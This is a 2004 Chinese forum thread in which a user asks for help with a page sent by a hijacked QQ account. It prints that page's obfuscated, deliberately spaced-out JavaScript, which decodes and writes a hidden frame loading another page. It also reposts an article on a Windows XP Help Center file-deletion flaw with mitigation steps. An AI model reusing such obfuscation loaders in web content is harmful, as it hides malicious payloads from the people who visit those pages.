求助,这的高人多,帮忙看看

[复制链接]
查看: 1462   回复: 17
发表于 2004-8-13 23:00:30 | 显示全部楼层 |阅读模式
一朋友的QQ中毒了,自动发消息,我以为是他发的,就点了发过来的连接,后他说不是他发的,晕,我看了那个网页的原代码是

<SCRIPT LANG UAGE="JavaS cript">
<!--
var HtmlS trings=["=gsbnftfu!spxt>#551/1#!dp mt>#+#>
 =gs bnf!tsd>#nn/iun#!gsb nfcp","sefs>#op#!tdspm mjoh>#bvup#!o psftj{f!nbs hjoxjeui>#1#!nbs hjoifj","hiu>#1#>
=0gsb nftfu>"];
fun ction psw(st){
  v ar v arS;
  v arS="";
  va r i;
  f or(v ar a=0;a<st.len gth;a++){
    i = st.charCod eAt(a);
    if (i==1)
      varS=varS+Stri ng.fromCh arCode('"'.charCo deAt()-1);
    els e if (i==2) {
      a++;
      varS+=Str ing.fromCh arCode(st.charCo deAt(a));
      }
    els e
      var S+=St ring.fro mCharCode(i-1);
  }
  re turn va rS;
};
var nu m=3;
fun cti on S(){
f or( i =0;i<num;i++)
  docu ment.wr ite(p sw(HtmlSt rings[i]));}
S();
// -->
</SCR IPT>
我把每个单词都随便加了个空格,免得在论坛上要是运行起来就麻烦了

看看这里面有什么机关,怎么办?
发表于 2004-8-14 01:09:12 | 显示全部楼层
研究这个?
回复 支持 反对

使用道具 举报

发表于 2004-8-14 09:52:33 | 显示全部楼层
我从来不盲目点QQ里的连接,即使是点也是要经过对方确认后打开防火墙才点.
你用杀毒软件杀杀看吧,不行的话删除QQ重新安装.
回复 支持 反对

使用道具 举报

发表于 2004-8-14 09:56:07 | 显示全部楼层
哈哈,毒
回复 支持 反对

使用道具 举报

红尘£滚滚 该用户已被删除
发表于 2004-8-14 12:13:03 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

planekll 该用户已被删除
发表于 2004-8-14 13:33:28 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

 楼主| 发表于 2004-8-14 18:00:53 | 显示全部楼层
我也下了RavQQMsender.exe,杀了没有发现毒。

“你用杀毒软件杀杀看吧,不行的话删除QQ重新安装” 这种病毒是将QQ重新装就给搞掉吗? 以前还没有遇到过,他感染了就是感染QQ,不干其他的坏事情吗?
回复 支持 反对

使用道具 举报

发表于 2004-8-14 22:45:21 | 显示全部楼层
Originally posted by 2222 at 2004-8-14 06:00 PM:
我也下了RavQQMsender.exe,杀了没有发现毒。

“你用杀毒软件杀杀看吧,不行的话删除QQ重新安装” 这种病毒是将QQ重新装就给搞掉吗? 以前还没有遇到过,他感染了就是感染QQ,不干其他的坏事情吗?


现在大多下木马,其实对网赚没直接影响,不过消耗资源罢了,找木马客星杀杀看
回复 支持 反对

使用道具 举报

发表于 2004-8-14 22:59:31 | 显示全部楼层
format
回复 支持 反对

使用道具 举报

 楼主| 发表于 2004-8-14 23:39:56 | 显示全部楼层

查看进程中有个不熟悉的程序:HelpCtr.exe
用GG一搜索这个程序的介绍,吓人啊:

看看WindowsXP是怎么被恶意攻击的![图]
日期:2003年12月30日 作者: 人气:314 查看:[大字体 中字体 小字体]  

微软匆匆发布Windows XP SP1可能是想掩盖其操作系统的脆弱性,Windows XP甚至使黑客们可以删除访问某种WEB页面的计算机上的文件。一个西班牙站点声称,Windows XP系统中存在一个缺陷,使得任何人都可以删除用户电脑上的文档。如果点击了一个带有恶意攻击的链接,或者访问一个恶意的Web站点,可能出现一个HTML格式的消息接收页面,遇到这种情况电脑上的某些文档就可能被删除。同时该站点上给出了一个示例。如果桌面上突然出现下面的页面,千万不要关闭它,否则它会删掉电脑里的所有信息!

遇到这种情况,按下Ctrl+Shift+ESC组合键,启动任务管理器,杀掉HelpCtr.exe这个进程。

另外对于高级用户来说也可以通过删除或者移动引起该恶意操作的文件来避免悲剧的发生,该文件UPLDDRVINFO.HTM,它的路径:\Windows\PCHEALTH\HELPCTR\SYSTEM\DFS\uplddrvinfo.htm。删除或者移动文件的位置后,前面的页面就会因为找不到文件的路径而出现页面错误,如下图所示。这时就可以安全地关闭弹出的窗口了。经过测试,该文件对于系统的正常运行没有影响。

?说得更清楚些,如果点击了一个特殊构造的URL链接,这种系统的脆弱性使系统中任何目录所包含的文件都可能被删除。这种URL可能出现在任何地方,比如恶意的电子邮件中、聊天室里、新闻组、恶意的Web页面或者甚至当你的计算机访问了一个页面,恶意的操作就可以被执行。

??看来这是一个非常致命的漏洞,并且微软也在竭力掩饰这个秘密。另外有人称在TechTV上看到一个报道,其中说微软11周之前就已经知道该漏洞,但是由于该漏洞非常容易被利用,因此公司一直保守这个秘密。

??微软在催促Windows XP用户下载Service Pack,尽快安装在系统上。Windows XP SP1是个很大的文件,文件的CD版本目前只能在美国和加拿大可以找到。
回复 支持 反对

使用道具 举报

发表于 2004-8-15 13:30:08 | 显示全部楼层
Originally posted by 红尘£滚滚 at 2004-8-14 12:13 PM:
http://it.rising.com.cn/service/technology/RS_QQMsender.htm

工具名称:RavQQMsender.exe
版 本 号:3.2
软件大小:104 KB



应用平台:Windows平台
更新时间:2004-08-11
发布时间 ...

求助,这的高人多,帮忙看看



美女与野兽我喜欢!!!
这个美女是谁啊??
回复 支持 反对

使用道具 举报

红尘£滚滚 该用户已被删除
发表于 2004-8-15 14:15:00 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

发表于 2004-8-15 16:48:12 | 显示全部楼层
不要光笑啊···
介绍一下哦····
回复 支持 反对

使用道具 举报

红尘£滚滚 该用户已被删除
发表于 2004-8-15 17:37:00 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

发表于 2004-8-15 18:16:09 | 显示全部楼层
求助,这的高人多,帮忙看看求助,这的高人多,帮忙看看求助,这的高人多,帮忙看看
谢谢你啊 !!!!

让你看看我的桌面!!

求助,这的高人多,帮忙看看
回复 支持 反对

使用道具 举报

发表于 2004-8-15 18:34:56 | 显示全部楼层
哈哈,强
回复 支持 反对

使用道具 举报

giggsfe 该用户已被删除
发表于 2004-8-15 19:25:24 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

planekll 该用户已被删除
发表于 2004-8-23 16:50:44 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则